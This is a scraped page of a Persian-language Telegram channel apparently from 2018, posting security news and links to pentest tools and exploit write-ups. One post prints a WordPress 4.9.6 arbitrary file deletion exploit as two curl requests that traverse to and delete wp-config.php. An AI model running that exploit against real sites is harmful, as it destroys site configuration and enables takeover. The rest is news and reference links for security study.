امنیت اطلاعات
@sec_nerd
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
About
Blog
Apps
Platform
Join
امنیت اطلاعات
847 subscribers
امنیت اطلاعات
قابل توجه کاربران سیستم عامل Gentoo

روز گذشته حساب گیت هاب سیستم عامل Gentoo توسط هکر یا هکرها مورد حمله قرار گرفت و سورس کد اصلی با سورس کد آلوده جایگزین شد!
این هکرها که ماهیت شان شناخته شده نیست در روز ۲۸ ژوئن موفق به دستیابی به حساب گیت هاب این سیستم عامل شدند.


منبع:
https://thehackernews.com/2018/06/gentoo-linux-github.html

#news
#linux
#github
#gentoo
#malware


@sec_nerd
223 views
امنیت اطلاعات
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد!

# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :

Step 1:


curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'


Step 2:


curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'



#wordpress
#wp
#exploit
#web
#pentest

@sec_nerd
WordPress.org
Download
Download WordPress today, and get started on creating your website with one of the most powerful, popular, and customizable platforms in the world.
238 views
امنیت اطلاعات
امنیت اطلاعات
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد! # Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability # Date: 2018-06-27 # Exploit Author: VulnSpy # Vendor Homepage: https://www.wordpress.org # Software Link: http:…
This media is not supported in your browser
VIEW IN TELEGRAM
نحوه کارکرد این باگ

https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/


#wp
#exploit
#wordpress


@sec_nerd
216 views
امنیت اطلاعات
لیست ۵۰۰ سوپر کامپیوتر جهان منتشر شد و رتبه اول قوی ترین سوپر کامپیوتر به IBM Summit از امریکا اختصاص یافت.
در این رده بندی امریکا اول است اما سوپرکامپیوترهای چینی تعداد بیشتری دارند.
پس از سالها، توجه رده بندی ها از CPU به سوی GPU کشیده شده است و در این زمینه NVidia مجالی به رقبای خود برای خودنمایی نداده است.
نکته جالب توجه، استفاده تمامی این سوپرکامپیوترها از سیستم عامل لینوکس است! (همانند سالهای پیش)

منبع:
https://fossbytes.com/top500-most-powerful-supercomputer-list-2018-powered-by-linux/


#AI
#ML
#news
#linux
#gpu
#IBM
#usa
#chinna


@sec_nerd
Fossbytes
Linux Powers ALL TOP500 Supercomputers In The World | US Beats China For #1
IBM Summit has tasted another bread of success as the TOP500 List of the world's fastest supercomputers renews for the year 2018. It's not surprising to see Summit ( with its Linpack score of 122.3 petaflops) taking the throne away from Sunway TaihuLight…
248 views
امنیت اطلاعات
امنیت اطلاعات
محققان سیسکو امروز اعلام کردند که یک بات نت بسیار بزرگ کشف کرده اند که از روترهای هک شده تشکیل شده و آماده یک حمله سایبری علیه اوکراین است. این بات نت توسط یک بدافزار که اقدام به آلوده کردن روترهای خانگی میکند، ساخته شده و VPNFilter نام دارد. محققان امنیتی…
This media is not supported in your browser
VIEW IN TELEGRAM
توضیحات Craig Williams مدیر اجرایی تیم امنیتی talos در خصوص نحوه مقابله با بات نت #vpnfilter

#talos
#network
#botnet


@sec_nerd
226 views
امنیت اطلاعات
#fun
#worldcup

no offense!

@sec_nerd
242 viewsedited  
امنیت اطلاعات
امنیت اطلاعات
آسیب پذیری جدید در phpmyadmin ورژن های خانواده 4.8 این آسیب پذیری نیاز به یوزر معتبر داشته و قادرست LFI را به RCE تبدیل کند https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/ #phpmyadmin #exploit #web #lfi #rce @sec_nerd
رایت آپ مربوط به آسیب پذیری RCE در phpmyadmin

https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e


#phpmyadmin
#exploit
#web
#lfi
#rce
#writeup

@sec_nerd
Medium
PHPMyAdmin 4.8.0 ~ 4.8.1 Remote Code Execution
TL;DR
249 viewsedited  
امنیت اطلاعات
CERT-EU_SWP_17-002_Lateral_Movements.pdf
680.9 KB
کشف حرکات جانبی در زیرساختهای ویندوزی


#windows
#security
#network
#lateral_movement


@sec_nerd
267 views
امنیت اطلاعات
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/


تسخیر شبکه با استفاده از ابزار Responder



#windows
#network
#privesc
#pivoting
#sniff

@sec_nerd
NotSoSecure
Pwning with Responder - A Pentester's Guide
Overview: Responder is a great tool that every pentester needs in their arsenal. If a client/target cannot resolve a name via DNS it will fall back to name resolution via LLMNR (introduced in Windows
253 views
امنیت اطلاعات
Media is too big
VIEW IN TELEGRAM
reverse engineering the "feature" provided by the capcom.sys driver on #Windows using Binary Ninja and Windbg.with a working exploit written in C

@sec_nerd
229 viewsedited  
امنیت اطلاعات
پس از اعلام شرکت آدیداس مبنی بر هک شدن وبسایت نمایندگی امریکای این شرکت، جزییاتی در خصوص اطلاعات به سرقت رفته منتشر شده است.
این اطلاعات شامل نام های کاربری و مشخصات میلیونها کاربر آدیداس بوده است.
اما آدیداس معتقد است که اطلاعات مربوط به سلامت و حسابهای بانکی مشتریان در این حمله دزدیده نشده، بعلاوه پسوردهای هک شده همگی دارای رمزنگاری مناسب بوده اند که این نشان از آمادگی مناسب آدیداس در برابر حملات این چنینی دارد.
اما آمادگی در برابر حمله هایی در این شکل و شمایل کافی نیست و نیاز به کار مداوم و بروزرسانی های امنیتی دائمی دارد.

هنوز جزییات دقیق تری از سوی آدیداس درخصوص این حمله منتشر نشده است.


منبع:
https://www.hackread.com/hackers-steal-millions-of-customers-data-from-adidas-us-website/


#adidas
#breach
#news


@sec_nerd
Hackread
Hackers steal millions of customers’ data from Adidas US website
Hackers have targeted Adidas US website and stole personal details of millions of customers including contact details.
265 viewsedited  
امنیت اطلاعات
دور زدن WAF با سوء استفاده از SSL/TLS

https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html

#waf
#pentest
#web

@sec_nerd
286 views
امنیت اطلاعات
usb_fan_report.pdf
251.9 KB
گزارش فنی-امنیتی از فن های usb مورد استفاده در نشست ترامپ و کیم جونگ اون در سنگاپور برای موارد جاسوسی

#spy
#usa
#nk
#enviromental


@sec_nerd
234 views
امنیت اطلاعات
لینوکس SUSE که متعلق به یک شرکت بریتانیایی بود با قیمت 2.5 میلیارد دلار به یک شرکت سهامی سوئدی فروخته شد.

https://thehackernews.com/2018/07/suse-linux-acquired.html

#news
#linux

@sec_nerd
215 views
امنیت اطلاعات
اجرای دستور در سرورهای ویندوزی با استفاده از آپلود فایل web.config

https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/


#windows
#pentest
#web
#rce


@sec_nerd
248 views
امنیت اطلاعات
#fun


@sec_nerd
216 views
امنیت اطلاعات
#xss


@sec_nerd
259 views
امنیت اطلاعات
هکرهای کره شمالی با کشف یک باگ 0day در یک نرم افزار دولتی کره جنوبی، حملات خود را به سیستم های حکومتی این کشور آغاز کرده اند. این نرم افزار همواره در سیستم های دولتی، پس از بوت شدن سیستم در حال اجرا است و در اینترنت اکسپلورر و کروم به راحتی و با بازدید از یک وبسایت آلوده به اکسپلویت به راحتی حمله را میتوان اجرا کرد!


https://twitter.com/issuemakerslab/status/1014227462157287424


#nk
#sk
#0day

@sec_nerd
Twitter
Simon Choi
NK hackers have started using the SK's software 0-day vuln. Affected SW is installed from government services and is always in process state after booting. Not only IE but even Chrome can activate the vuln by visiting a specially crafted website. It is a…
220 views
امنیت اطلاعات
امنیت اطلاعات
هکرهای کره شمالی با کشف یک باگ 0day در یک نرم افزار دولتی کره جنوبی، حملات خود را به سیستم های حکومتی این کشور آغاز کرده اند. این نرم افزار همواره در سیستم های دولتی، پس از بوت شدن سیستم در حال اجرا است و در اینترنت اکسپلورر و کروم به راحتی و با بازدید از…
ارتش سایبری کره شمالی دارای ۱۷۰۰ هکر در ۶ تیم و ۵۱۰۰ هکر در ۱۷ تیم دیگر است!

https://twitter.com/issuemakerslab/status/1011392967653769216


#nk
#0day

@sec_nerd
Twitter
Simon Choi
According to the NIS, North Korea's cyber hacking organization has 1,700 hackers from 6 organizations and about 5100 from 17 organizations supporting the hacking.
200 views
امنیت اطلاعات
اکسپلویت اجرای دستور از راه دور در سیستم مدیریت محتوای CMS made Simple 2.2.5

کد شناسه CVE-2018-1000094

https://github.com/strukt93/exploits/blob/master/CVE-2018-1000094.py


#web
#pentest
#0day
#exploit
#cms_made_simple


@sec_nerd
GitHub
exploits/CVE-2018-1000094.py at master · strukt93/exploits
Contribute to strukt93/exploits development by creating an account on GitHub.
215 views
امنیت اطلاعات
اخیرا نقشه تعاملی بر روی اینترنت قرار گرفته است که پسورد سرویس وای فای فرودگاه های کشورهای مختلف را به کاربران ارائه میکند.
این سرویس توسط یک محقق امنیتی و جهانگرد به نام Anil Polat طراحی شده است.
این سرویس که WiFox نام دارد برای کاربران اندروید و ios اپ هایی نیز ارائه میکند.

اندروید:
https://play.google.com/store/apps/details?id=com.foxnomad.wifox.wifox&hl=en


ios:
https://itunes.apple.com/us/app/wifox/id1130542083?mt=8

البته استفاده از کانکشن های وای فای در اماکن عمومی به هیچ وجه توصیه نمیشود اما میتوانید با رعایت موارد امنیتی نظیر بکارگیری vpn های امن مانند tor،‌از این امکانات بهره ببرید (با نظر به این نکته که در فرودگاههای ایران ساعات زیادی رو باید منتظر پروازتون باشید!)

این نقشه، پسورد وایفای فرودگاه امام خمینی (ره) را نیز دارد که در پست بعد خواهیم دید.
شایان ذکر است که این نقشه و اطلاعات فرودگاهها و پسوردها به صورت روزانه در حال بروزرسانی است.


منبع؛
https://www.hackread.com/airports-free-wifi-passwords-map/


#news
#wifi
#security
#airport
#travel


@sec_nerd
Google Play
WiFox - Apps on Google Play
WiFox is a continually updated map of airport & lounge wifi passwords worldwide.
247 views